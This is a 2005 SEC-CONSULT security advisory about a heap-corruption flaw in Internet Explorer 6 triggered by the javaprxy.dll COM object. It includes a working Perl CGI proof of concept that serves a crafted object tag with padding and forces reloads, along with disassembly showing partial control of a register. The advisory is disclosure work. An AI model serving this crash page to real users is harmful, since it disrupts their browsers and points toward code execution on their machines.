ieCrash-javaprxy.txt

`SEC-CONSULT Security Advisory < 20050629-0 >  
==================================================================================  
title: IE6 javaprxy.dll COM instantiation heap corruption  
vulnerability  
program: Internet Explorer  
vulnerable version: 6.0.2900.2180  
homepage: www.microsoft.com  
found: 2005-06-17  
by: sk0L & Martin Eiszner / SEC-CONSULT /  
www.sec-consult.com  
==================================================================================  
  
  
background:  
---------------  
  
Internet Explorer supports instantiation of non-ActiveX controls, e.g  
COM objects, via <object> tags. according to M$, COM components respond  
gracefully to attempts to treat them as non-ActiveX controls. on the  
contrary, we found that at least 20 of the objects available on an  
average XP system either lead to an instant crash or an exception after  
a few reloads.  
  
  
vulnerability overview:  
---------------  
  
Loading HTML documents with certain embedded CLSIDs results in  
null-pointer exceptions or memory corruption. in one case, we could  
leverage this bug to overwrite a function pointer in the data segment.  
it *may* be possible to exploit this issue to execute arbitrary code in  
the context of IE.  
  
  
proof of concept:  
---------------  
  
this simple CGI should crash IE.  
  
  
---------------  
  
#!/usr/bin/perl  
  
# in order for this to work javaprxy.dll must be available on the client.  
  
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll  
  
my $html1 = "<html><body>\n<object  
classid=\"CLSID:".$clsid."\"></object>\n";  
my $html2 = "\n</body><script>location.reload();</script></html>\n";  
  
print "Content-Type: text/html;\r\n\r\n";  
  
print $html1.("A"x30000).$html2;  
  
---------------  
  
on our lab machine, we, end up with eax=00410041, and an exception  
occurs at the following location in javaprxy.dll:  
  
---------------  
  
.text:7C508660 mov eax, [ecx]  
.text:7C508662 test eax, eax  
.text:7C508664 jz short locret_7C50866C  
.text:7C508666 mov ecx, [eax]  
.text:7C508668 push eax  
.text:7C508669 call dword ptr [ecx+8]  
  
---------------  
  
as you can see, this situation may be exploitable, considering that we  
have some level of control over eax.  
  
  
vulnerable versions:  
---------------  
  
javaprxy.dll 5.00.3810  
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519  
  
these are the versions tested, other versions may of course be vulnerable.  
  
vendor status:  
---------------  
vendor notified: 2005-06-17  
vendor response: 2005-06-17  
patch available: ?  
  
microsoft does not confirm the vulnerability, as their product team can  
not reproduce condition. however, they are looking at making changes to  
handle COM objects in a more robust manner in the future.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
< Bernhard Müller / Martin Eiszner > / www.sec-consult.com /  
SGT ::: walter|bruder, flo, tke, dfa :::  
  
  
`